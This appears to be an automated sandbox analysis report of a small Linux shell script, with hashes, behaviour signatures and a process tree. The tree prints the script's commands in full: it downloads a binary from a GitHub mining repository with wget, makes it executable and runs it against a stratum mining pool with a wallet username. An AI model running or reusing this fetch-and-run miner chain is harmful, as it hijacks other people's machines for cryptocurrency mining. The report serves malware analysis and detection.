Analysis
-
max time kernel
7s -
max time network
897s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
14/07/2024, 09:08
Static task
static1
Behavioral task
behavioral1
Sample
triage.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
triage.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral3
Sample
triage.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral4
Sample
triage.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
triage.sh
-
Size
338B
-
MD5
dead3dccf4825eb422f4dac04f2d8279
-
SHA1
61285497f6daecf9d6d6128d5ced6f19057f93bd
-
SHA256
6df4fd30bb503ece3c987d6932d355fa7da868fa28f901b9781e6fd8df1bf4db
-
SHA512
c4c5fc0a655488ea60b4d5801cab925e180e3d018f88e9238eb9bc794ddc73ec44059fad796cb1655fed44a7c861990d5960eb7a41f8fa4a24390cb27cd1f55b
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/cc 1593 cc -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 14 raw.githubusercontent.com 15 raw.githubusercontent.com 16 raw.githubusercontent.com -
Reads runtime system information 14 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/filesystems sudo File opened for reading /proc/self/fd apt-get File opened for reading /proc/filesystems dpkg File opened for reading /proc/1578/cgroup http File opened for reading /proc/1586/cgroup http File opened for reading /proc/filesystems dpkg File opened for reading /proc/1/cgroup http File opened for reading /proc/sys/kernel/ngroups_max apt-get File opened for reading /proc/1/cgroup http File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/self/stat sudo File opened for reading /proc/1/limits sudo File opened for reading /proc/1/cgroup http File opened for reading /proc/1585/cgroup http -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/cc wget
Processes
-
/tmp/triage.sh/tmp/triage.sh1⤵PID:1560
-
/usr/bin/sudosudo apt-get install libcurl4-openssl-dev libssl-dev libomp-dev libjansson-dev automake autotools-dev build-essential -y2⤵
- Reads runtime system information
PID:1561 -
/usr/bin/apt-getapt-get install libcurl4-openssl-dev libssl-dev libomp-dev libjansson-dev automake autotools-dev build-essential -y3⤵
- Reads runtime system information
PID:1571 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:1572
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:1573
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http4⤵PID:1577
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http4⤵
- Reads runtime system information
PID:1578
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http4⤵
- Reads runtime system information
PID:1585
-
-
/usr/lib/apt/methods/http/usr/lib/apt/methods/http4⤵
- Reads runtime system information
PID:1586
-
-
-
-
/usr/bin/wgetwget https://raw.githubusercontent.com/MomboteQ/Free-Crypto-Mining/main/verus/cc2⤵
- Writes file to tmp directory
PID:1587
-
-
/usr/bin/chmodchmod +x cc2⤵PID:1590
-
-
/usr/bin/clearclear2⤵PID:1591
-
-
/usr/bin/nprocnproc2⤵PID:1592
-
-
/tmp/cc./cc -a verus -o stratum+tcp://verus.farm:9999 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Linux -p x -t 12⤵
- Executes dropped EXE
PID:1593
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
180B
MD50e4286681cdb649f574d568bf0d803f0
SHA1b6c217dd857fe460e2ba28a841daef0158a19edf
SHA256f43ac73ba80acc15bd3e2530081d8df5b13fc818750a0dc5ccc9ff693a6ad3fc
SHA5129c6f910eb58acdb7dcf3ed3e44e4accfb6bc8cba13432c621b4ff4d04aa232ee949c3052ba71020b92baafaebaad2970ad7261e0177e7fdf6a930d40c9c67f0d
-
Filesize
196KB
MD54011d473f6b06caa7f3d514e4eeb2184
SHA1529bda4d64920cac51baa6b34b8bcabf19d97248
SHA256bf7d1a01e88322991a824676601b46be7625b50a9d8ee8de085cc86ba76f7bc2
SHA51245f9da5d9f43c1876fc3659a8e7e03b9d06ec83bf6c8d237daf3809cbec01a5c59688a1cf4780d695750fc42920428ff69545f5dce11b888418df919c3625f39
-
Filesize
329KB
MD5a5c1029062b287f8df7b37dc43c9264f
SHA1f8eeb30ce97e0b41f14feb86bd0e02a600efcded
SHA25696b528889794c4134015a63c75050f93d8aecdf5e3f2a20993c1433f4c61b80e
SHA512c450fb56789f533ac939beeaf19019aeaee417bc8de4b3234b0ac4a3575f114d803046f0475264d70a7b724727d2be4a4ce49023f120086b179ebf4e123018e7
-
Filesize
544KB
MD5eeea4b7cf5024babf73a4dd96a6f5790
SHA10950f7e15117bd6f7167b11bcd12801a98111fbf
SHA25659e3890fc8407bcf8ccc9f709d6513156346d5c942e8c624dc90435e58f6f978
SHA512078de0cb9f0393d8bdfa7d1b5db0eb718125e15a65bd6038866cb9f84b033440087cbcc8f773af2102a14c42dd71360b988986fbbc679bcabe1dfc1c66c5d931
-
Filesize
43KB
MD5554dc72dc46c7ebd3caf852031a94fe8
SHA12899e7c9989ee14a2be5a5a431a49498e1494084
SHA256d909f0327b09d9a9136239caca975df89782fa28efd721c4eb4caea422d3fc5a
SHA512b3add366e8549028f8de8c1c21796ff1ed8831e3432dedac73e795e021bcd23fb0c4e5fcbaf6f512b21b2f5d1c747bc7bccad1719a3255988ff2d7f5ce81f3d4
-
Filesize
376KB
MD5888058d6427ed97a3eccf59cb9867b2d
SHA166c360985b77680e27b1ed44ed7c9946b6f12211
SHA256f74a1c1d0348601ad1baa8b32011f71f8e486099904492fe48e3fb3172c87c5e
SHA5124e0f93a220de35ae77552057cc7922d5f454493060776afd61306ef735302dc725625c974f9c37e2e2f32d47e90d07e5652671e51fc43fd5b002c48524e65a74
-
Filesize
34KB
MD548df7bbc36d5cb03b7352ffb938b01b7
SHA178d69ae257c47adba4ef33ed36d7ebb355df9de9
SHA256d2cead9aa3c370c58a1c2ee68bdc56ab13dea7cc2e636d87da5e762410b4d238
SHA5121dd5e3a2a15fe02219ba07009adf8b1b371b4ab03223d3381d9c26378d777b21f4cc8b65a408d0c85cfeb558685cd8a01c0884f677fe2eee4d03ba0c0054b18b
-
Filesize
22.9MB
MD504f816be048abfc53e8ddce7179b329a
SHA1646be437f934b568f42bf659df1bd86703295672
SHA2569044b614a6c7fb6262e7cbeb13dc731fc0c92bed96281c1a3920dd706442ee8e
SHA512412647a0187117f0764eec27e6668346421bbc8d3bac2591248b8c0cf062b0724ee833ea3d490d651b3d43362e758ca38bb24285d495592432a7d4d5c90df9ee
-
Filesize
338KB
MD5151772c05a23abdbfabf36caec2970ed
SHA1a012872cbe6b8b0eaf0fb116e7d7425aa5c6d2a6
SHA256ce3d72f3d7c1b499b156303c8415e729fe027da7ab2f45653e92e3e64593c402
SHA5127b4be36bcc7b6d140151c9f2e703efd5454b1356e8cf17552903ebbfb62bc57db974a3ca5de56a9a714396233a73b86aabf4dd8910abc6222c90a48e6860be29
-
Filesize
3KB
MD5e36568cabd91924b5158979ddc670e12
SHA109ea25565a7d225432800404b1fae96c954f2fda
SHA256445f75e6fd75fe5606e7a2855b8bf13ddb4301ae4ed6d364d30b5e403f86e634
SHA5122a79b3a5ae5bf9ecf6a757588ab99086962053a46397318152fa59d039a761f7c09fc34c28608c682ea1bd01e68846916505349d6e6dc4469b49023c170c1df7
-
Filesize
379KB
MD543e99ed785c926bc2dd92553ddbc758b
SHA18d3db5fc8140ebbe7dfa7cd69008871564198e9f
SHA2567b69ec021dd19555c16e250827f57be88381ff2fff9bdbd1b3a2d25d27558cea
SHA512db068750b9367f361aa883f4412c0d02606838c5ef13aeec0935caf62ea8bbf590986971636fc369583af401ba8e8f250d1818a0c58a75593b6c214590c3432c
-
Filesize
194KB
MD537ff1a23261e591841876b445fb64269
SHA17a851efc87635d8c691f3b5513c9b3c960c76f03
SHA256572a544d2c18bf49d25c465720c570cd8e6e38731386ac9c0a7f29bed2486f3e
SHA51293e92c12d65be24be49c20a004c8d6ce55ad5f9c788b6a8092808796c6c4670acdccd5b8591152967117647757fcdbf571ebadd1342ac9729ea88c8e625b61b6